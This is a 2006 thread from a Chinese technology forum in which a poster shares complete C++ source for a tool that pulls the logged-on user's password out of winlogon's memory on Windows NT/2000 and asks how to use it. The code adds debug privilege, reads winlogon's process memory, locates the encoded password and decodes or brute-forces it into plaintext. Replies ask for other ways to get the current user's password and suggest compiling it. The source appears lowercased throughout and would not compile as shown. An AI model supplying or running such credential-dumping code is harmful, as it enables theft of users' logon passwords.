热点科技

标题: [求助] 找到这段代码，但不知怎么用 [打印本页]

作者: gaoxinwei 时间: 2006-8-26 19:45
标题: [求助] 找到这段代码，但不知怎么用
找到这段代码，但不知怎么用
NT和win2000下获得当前用户密码

代码(用C++)

// passwordreminder.cpp
//
// this code is licensed under the terms of the gpl (gnu public license).
//
#include <windows.h>
#include <tchar.h>
#include <stdio.h>
typedef struct _unicode_string
{
ushort length;
ushort maximumlength;
pwstr buffer;
} unicode_string, *punicode_string;
// undocumented typedef‘s
typedef struct _query_system_information
{
dword grantedaccess;
dword pid;
word handletype;
word handleid;
dword handle;
} query_system_information, *pquery_system_information;
typedef struct _process_info_header
{
dword count;
dword unk04;
dword unk08;
} process_info_header, *pprocess_info_header;
typedef struct _process_info
{
dword loadaddress;
dword size;
dword unk08;
dword enumerator;
dword unk10;
char name [0x108];
} process_info, *pprocess_info;
typedef struct _encoded_password_info
{
dword hashbyte;
dword unk04;
dword unk08;
dword unk0c;
filetime loggedon;
dword unk18;
dword unk1c;
dword unk20;
dword unk24;
dword unk28;
unicode_string encodedpassword;
} encoded_password_info, *pencoded_password_info;
typedef dword (__stdcall *pfnntquerysysteminformation) (dword, pvoid, dword, pdword);
typedef pvoid (__stdcall *pfnrtlcreatequerydebugbuffer) (dword, dword);
typedef dword (__stdcall *pfnrtlqueryprocessdebuginformation) (dword, dword, pvoid);
typedef void (__stdcall *pfnrtldestroyquerydebugbuffer) (pvoid);
typedef void (__stdcall *pfntrtlrundecodeunicodestring) (byte, punicode_string);
// private prototypes
bool iswinnt (void);
bool iswin2k (void);
bool adddebugprivilege (void);
dword findwinlogon (void);
bool locatepasswordpagewinnt (dword, pdword);
bool locatepasswordpagewin2k (dword, pdword);
void displaypasswordwinnt (void);
void displaypasswordwin2k (void);
// global variables
pfnntquerysysteminformation pfnntquerysysteminformation;
pfnrtlcreatequerydebugbuffer pfnrtlcreatequerydebugbuffer;
pfnrtlqueryprocessdebuginformation pfnrtlqueryprocessdebuginformation;
pfnrtldestroyquerydebugbuffer pfnrtldestroyquerydebugbuffer;
pfntrtlrundecodeunicodestring pfnrtlrundecodeunicodestring;
dword passwordlength = 0;
pvoid realpasswordp = null;
pvoid passwordp = null;
dword hashbyte = 0;
wchar_t username [0x400];
wchar_t userdomain [0x400];
int __cdecl
main
　(int argc,
　char* argv[])
{
printf (" passwordreminder ");
if ((!iswinnt ())
　 &&
　(!iswin2k ()))
{
　printf ("windows nt or windows 2000 are required. ");
　return (0);
}
// add debug privilege to passwordreminder -
// this is needed for the search for winlogon.
if (!adddebugprivilege ())
{
　printf
　 ("unable to add debug privilege. ");
　return (0);
}
printf ("the debug privilege has been added to passwordreminder. ");
hinstance hntdll =
　loadlibrary
　 ("ntdll.dll");
pfnntquerysysteminformation =
　(pfnntquerysysteminformation) getprocaddress
　 (hntdll,
　 "ntquerysysteminformation");
pfnrtlcreatequerydebugbuffer =
　(pfnrtlcreatequerydebugbuffer) getprocaddress
　 (hntdll,
　 "rtlcreatequerydebugbuffer");
pfnrtlqueryprocessdebuginformation =
　(pfnrtlqueryprocessdebuginformation) getprocaddress
　 (hntdll,
　 "rtlqueryprocessdebuginformation");
pfnrtldestroyquerydebugbuffer =
　(pfnrtldestroyquerydebugbuffer) getprocaddress
　 (hntdll,
　 "rtldestroyquerydebugbuffer");
pfnrtlrundecodeunicodestring =
　(pfntrtlrundecodeunicodestring) getprocaddress
　 (hntdll,
　 "rtlrundecodeunicodestring");
// locate winlogon‘s pid - need debug privilege and admin rights.
dword winlogonpid =
　findwinlogon ();
if (winlogonpid == 0)
{
　printf
　 ("passwordreminder is unable to find winlogon or you are using nwgina.dll. ");
　printf
　 ("passwordreminder is unable to find the password in memory. ");
　freelibrary
　 (hntdll);
　return (0);
}
printf
　("the winlogon process id is %d (0x%8.8lx). ",
　winlogonpid,
　winlogonpid);
// set values to check memory block against.
memset
　(username,
　0,
　sizeof (username));
memset
　(userdomain,
　0,
　sizeof (userdomain));
getenvironmentvariablew
　(l"username",
　username,
　0x400);
getenvironmentvariablew
　(l"userdomain",
　userdomain,
　0x400);
// locate the block of memory containing
// the password in winlogon‘s memory space.
bool foundpasswordpage = false;
if (iswin2k ())
　foundpasswordpage =
　 locatepasswordpagewin2k
　　(winlogonpid,
　　&passwordlength);
else
　foundpasswordpage =
　 locatepasswordpagewinnt
　　(winlogonpid,
　　&passwordlength);
if (foundpasswordpage)
{
　if (passwordlength == 0)
　{
　 printf
　　("the logon information is: %s/%s. ",
　　userdomain,
　　username);
　 printf
　　("there is no password. ");
　}
　else
　{
　 printf
　　("the encoded password is found at 0x%8.8lx and has a length of %d. ",
　　realpasswordp,
　　passwordlength);
　 // decode the password string.
　 if (iswin2k ())
　　displaypasswordwin2k ();
　 else
　　displaypasswordwinnt ();
　}
}
else
　printf
　 ("passwordreminder is unable to find the password in memory. ");
freelibrary
　(hntdll);
return (0);
} // main
bool
iswinnt
　(void)
{
osversioninfo osversioninfo;
osversioninfo.dwosversioninfosize = sizeof (osversioninfo);
if (getversionex
　 (&osversioninfo))
　return (osversioninfo.dwplatformid == ver_platform_win32_nt);
else
　return (false);
} // iswinnt
bool
iswin2k
　(void)
{
osversioninfo osversioninfo;
osversioninfo.dwosversioninfosize = sizeof (osversioninfo);
if (getversionex
　 (&osversioninfo))
　return ((osversioninfo.dwplatformid == ver_platform_win32_nt)
　　 &&
　　(osversioninfo.dwmajorversion == 5));
else
　return (false);
} // iswin2k
bool
adddebugprivilege
　(void)
{
handle token;
token_privileges tokenprivileges, previousstate;
dword returnlength = 0;
if (openprocesstoken
　 (getcurrentprocess (),
　 token_query │ token_adjust_privileges,
　 &token))
　if (lookupprivilegevalue
　　(null,
　　"sedebugprivilege",
　　&tokenprivileges.privileges[0].luid))
　{
　 tokenprivileges.privilegecount = 1;
　 tokenprivileges.privileges[0].attributes = se_privilege_enabled;
　 return
　　(adjusttokenprivileges
　　 (token,
　　 false,
　　 &tokenprivileges,
　　 sizeof (token_privileges),
　　 &previousstate,
　　 &returnlength));
　}
return (false);
} // adddebugprivilege
// note that the following code eliminates the need
// for psapi.dll as part of the executable.
dword
findwinlogon
　(void)
{
#define initial_allocation 0x100
dword rc = 0;
dword sizeneeded = 0;
pvoid infop =
　heapalloc
　 (getprocessheap (),
　 heap_zero_memory,
　 initial_allocation);
// find how much memory is required.
pfnntquerysysteminformation
　(0x10,
　infop,
　initial_allocation,
　&sizeneeded);
heapfree
　(getprocessheap (),
　0,
　infop);
// now, allocate the proper amount of memory.
infop =
　heapalloc
　 (getprocessheap (),
　 heap_zero_memory,
　 sizeneeded);
dword sizewritten = sizeneeded;
if (pfnntquerysysteminformation
　 (0x10,
　 infop,
　 sizeneeded,
　 &sizewritten))
{
　heapfree
　 (getprocessheap (),
　 0,
　 infop);
　return (0);
}
dword numhandles = sizewritten / sizeof (query_system_information);
if (numhandles == 0)
{
　heapfree
　 (getprocessheap (),
　 0,
　 infop);
　return (0);
}
pquery_system_information querysysteminformationp =
　(pquery_system_information) infop;
dword i;
for (i = 1; i <= numhandles; i++)
{
　// "5" is the value of a kernel object type process.
　if (querysysteminformationp->handletype == 5)
　{
　 pvoid debugbufferp =
　　pfnrtlcreatequerydebugbuffer
　　 (0,
　　 0);
　 if (pfnrtlqueryprocessdebuginformation
　　 (querysysteminformationp->pid,
　　 1,
　　 debugbufferp) == 0)
　 {
　　pprocess_info_header processinfoheaderp =
　　 (pprocess_info_header) ((dword) debugbufferp + 0x60);
　　dword count =
　　 processinfoheaderp->count;
　　pprocess_info processinfop =
　　 (pprocess_info) ((dword) processinfoheaderp + sizeof (process_info_header));
　　if (strstr (_strupr (processinfop->name), "winlogon") != 0)
　　{
　　 dword i;
　　 dword dw = (dword) processinfop;
　　 for (i = 0; i < count; i++)
　　 {
　　　dw += sizeof (process_info);
　　　processinfop = (pprocess_info) dw;
　　　if (strstr (_strupr (processinfop->name), "nwgina") != 0)
　　　 return (0);
　　　if (strstr (_strupr (processinfop->name), "msgina") == 0)
　　　 rc =
　　　　querysysteminformationp->pid;
　　 }
　　 if (debugbufferp)
　　　pfnrtldestroyquerydebugbuffer
　　　 (debugbufferp);
　　 heapfree
　　　(getprocessheap (),
　　　0,
　　　infop);
　　 return (rc);
　　}
　 }
　 if (debugbufferp)
　　pfnrtldestroyquerydebugbuffer
　　 (debugbufferp);
　}
　dword dw = (dword) querysysteminformationp;
　dw += sizeof (query_system_information);
　querysysteminformationp = (pquery_system_information) dw;
}
heapfree
　(getprocessheap (),
　0,
　infop);
return (rc);
} // findwinlogon
bool
locatepasswordpagewinnt
　(dword winlogonpid,
　pdword passwordlength)
{
#define user_domain_offset_winnt 0x200
#define user_password_offset_winnt 0x400
bool rc = false;
handle winlogonhandle =
　openprocess
　 (process_query_information │ process_vm_read,
　 false,
　 winlogonpid);
if (winlogonhandle == 0)
　return (rc);
*passwordlength = 0;
system_info systeminfo;
getsysteminfo
　(&systeminfo);
dword peb = 0x7ffdf000;
dword bytescopied = 0;
pvoid pebp =
　heapalloc
　 (getprocessheap (),
　 heap_zero_memory,
　 systeminfo.dwpagesize);
if (!readprocessmemory
　 (winlogonhandle,
　 (pvoid) peb,
　 pebp,
　 systeminfo.dwpagesize,
　 &bytescopied))
{
　closehandle
　 (winlogonhandle);
　return (rc);
}
// grab the value of the 2nd dword in the teb.
pdword winlogonheap = (pdword) ((dword) pebp + (6 * sizeof (dword)));
memory_basic_information memorybasicinformation;
if (virtualqueryex
　 (winlogonhandle,
　 (pvoid) *winlogonheap,
　 &memorybasicinformation,
　 sizeof (memory_basic_information)))
　if (((memorybasicinformation.state & mem_commit) == mem_commit)
　　&&
　 ((memorybasicinformation.protect & page_guard) == 0))
　{
　 pvoid winlogonmemp =
　　heapalloc
　　 (getprocessheap (),
　　 heap_zero_memory,
　　 memorybasicinformation.regionsize);
　 if (readprocessmemory
　　 (winlogonhandle,
　　 (pvoid) *winlogonheap,
　　 winlogonmemp,
　　 memorybasicinformation.regionsize,
　　 &bytescopied))
　 {
　　dword i = (dword) winlogonmemp;
　　dword usernamepos = 0;
　　// the order in memory is username followed by the userdomain.
　　do
　　{
　　 if ((wcscmp (username, (wchar_t *) i) == 0)
　　　 &&
　　　(wcscmp (userdomain, (wchar_t *) (i + user_domain_offset_winnt)) == 0))
　　 {
　　　usernamepos = i;
　　　break;
　　 }
　　 i += 2;
　　} while (i < (dword) winlogonmemp + memorybasicinformation.regionsize);
　　if (usernamepos)
　　{
　　 pencoded_password_info encodedpasswordinfop =
　　　(pencoded_password_info)
　　　 ((dword) usernamepos + user_password_offset_winnt);
　　 filetime localfiletime;
　　 systemtime systemtime;
　　 if (filetimetolocalfiletime
　　　(&encodedpasswordinfop->loggedon,
　　　&localfiletime))
　　　if (filetimetosystemtime
　　　 (&localfiletime,
　　　 &systemtime))
　　　 printf
　　　　("you logged on at %d/%d/%d %d:%d:%d ",
　　　　systemtime.wmonth,
　　　　systemtime.wday,
　　　　systemtime.wyear,
　　　　systemtime.whour,
　　　　systemtime.wminute,
　　　　systemtime.wsecond);
　　 *passwordlength =
　　　(encodedpasswordinfop->encodedpassword.length & 0x00ff) / sizeof (wchar_t);
　　 hashbyte =
　　　(encodedpasswordinfop->encodedpassword.length & 0xff00) >> 8;
　　 realpasswordp =
　　　(pvoid) (*winlogonheap +
　　　 (usernamepos - (dword) winlogonmemp) +
　　　 user_password_offset_winnt + 0x34);
　　 passwordp =
　　　(pvoid) ((pbyte) (usernamepos +　
　　　 user_password_offset_winnt + 0x34));
　　 rc = true;
　　}
　 }
　}
heapfree
　(getprocessheap (),
　0,
　pebp);
closehandle
　(winlogonhandle);
return (rc);
} // locatepasswordpagewinnt
bool
locatepasswordpagewin2k
　(dword winlogonpid,
　pdword passwordlength)
{
#define user_domain_offset_win2k 0x400
#define user_password_offset_win2k 0x800
handle winlogonhandle =
　openprocess
　 (process_query_information │ process_vm_read,
　 false,
　 winlogonpid);
if (winlogonhandle == 0)
　return (false);
*passwordlength = 0;
system_info systeminfo;
getsysteminfo
　(&systeminfo);
dword i = (dword) systeminfo.lpminimumapplicationaddress;
dword maxmemory = (dword) systeminfo.lpmaximumapplicationaddress;
dword increment = systeminfo.dwpagesize;
memory_basic_information memorybasicinformation;
while (i < maxmemory)
{
　if (virtualqueryex
　　(winlogonhandle,
　　(pvoid) i,
　　&memorybasicinformation,
　　sizeof (memory_basic_information)))
　{
　 increment = memorybasicinformation.regionsize;
　 if (((memorybasicinformation.state & mem_commit) == mem_commit)
　　 &&
　　((memorybasicinformation.protect & page_guard) == 0))
　 {
　　pvoid realstartingaddressp =
　　 heapalloc
　　　(getprocessheap (),
　　　heap_zero_memory,
　　　memorybasicinformation.regionsize);
　　dword bytescopied = 0;
　　if (readprocessmemory
　　　(winlogonhandle,
　　　(pvoid) i,
　　　realstartingaddressp,
　　　memorybasicinformation.regionsize,
　　　&bytescopied))
　　{
　　 if ((wcscmp ((wchar_t *) realstartingaddressp, username) == 0)
　　　 &&
　　　(wcscmp ((wchar_t *) ((dword) realstartingaddressp + user_domain_offset_win2k), userdomain) == 0))
　　 {
　　　realpasswordp = (pvoid) (i + user_password_offset_win2k);
　　　passwordp = (pvoid) ((dword) realstartingaddressp + user_password_offset_win2k);
　　　// calculate the length of encoded unicode string.
　　　pbyte p = (pbyte) passwordp;
　　　dword loc = (dword) p;
　　　dword len = 0;
　　　if ((*p == 0)
　　　　&&
　　　 (* (pbyte) ((dword) p + 1) == 0))
　　　 ;
　　　else
　　　 do
　　　 {
　　　　len++;
　　　　loc += 2;
　　　　p = (pbyte) loc;
　　　 } while
　　　　(*p != 0);
　　　*passwordlength = len;
　　　closehandle
　　　 (winlogonhandle);
　　　return (true);
　　 }
　　}
　　heapfree
　　 (getprocessheap (),
　　 0,
　　 realstartingaddressp);
　 }
　}
　else
　 increment = systeminfo.dwpagesize;
　// move to next memory block.
　i += increment;
}
closehandle
　(winlogonhandle);
return (false);
} // locatepasswordpagewin2k
void
displaypasswordwinnt
　(void)
{
unicode_string encodedstring;
encodedstring.length =
　(word) passwordlength * sizeof (wchar_t);
encodedstring.maximumlength =
　((word) passwordlength * sizeof (wchar_t)) + sizeof (wchar_t);
encodedstring.buffer =
　(pwstr) heapalloc
　 (getprocessheap (),
　 heap_zero_memory,
　 encodedstring.maximumlength);
copymemory
　(encodedstring.buffer,
　passwordp,
　passwordlength * sizeof (wchar_t));
// finally - decode the password.
// note that only one call is required since the hash-byte
// was part of the orginally encoded string.
pfnrtlrundecodeunicodestring
　((byte) hashbyte,
　&encodedstring);
printf
　("the logon information is: %s/%s/%s. ",
　userdomain,
　username,
　encodedstring.buffer);
printf
　("the hash byte is: 0x%2.2x. ",
　hashbyte);
heapfree
　(getprocessheap (),
　0,
　encodedstring.buffer);
} // displaypasswordwinnt
void
displaypasswordwin2k
　(void)
{
dword i, hash = 0;
unicode_string encodedstring;
encodedstring.length =
　(ushort) passwordlength * sizeof (wchar_t);
encodedstring.maximumlength =
　((ushort) passwordlength * sizeof (wchar_t)) + sizeof (wchar_t);
encodedstring.buffer =
　(pwstr) heapalloc
　 (getprocessheap (),
　 heap_zero_memory,
　 encodedstring.maximumlength);
// this is a brute force technique since the hash-byte
// is not stored as part of the encoded string - :>(.
for (i = 0; i <= 0xff; i++)
{
　copymemory
　 (encodedstring.buffer,
　 passwordp,
　 passwordlength * sizeof (wchar_t));
　// finally - try to decode the password.
　pfnrtlrundecodeunicodestring
　 ((byte) i,
　 &encodedstring);
　// check for a viewable password.
　pbyte p = (pbyte) encodedstring.buffer;
　bool viewable = true;
　dword j, k;
　for (j = 0; (j < passwordlength) && viewable; j++)
　{
　 if ((*p)
　　 &&
　　(* (pbyte)(dword (p) + 1) == 0))
　 {
　　if (*p < 0x20)
　　 viewable = false;
　　if (*p > 0x7e)
　　 viewable = false;
　 }
　 else
　　viewable = false;
　 k = dword (p);
　 k++; k++;
　 p = (pbyte) k;
　}
　if (viewable)
　{
　 printf
　　("the logon information is: %s/%s/%s. ",
　　userdomain,
　　username,
　　encodedstring.buffer);
　 printf
　　("the hash byte is: 0x%2.2x. ",
　　i);
　}
}
heapfree
　(getprocessheap (),
　0,
　encodedstring.buffer);
} // displaypasswordwin2k
// end passwordreminder.cpp

作者: gesila 时间: 2006-8-26 19:49
或者有其它方法可以找到当前用户密码？

作者: shakuang 时间: 2006-8-26 20:06
你先编译了看啊

欢迎光临热点科技 (http://www.itheat.com/activity/)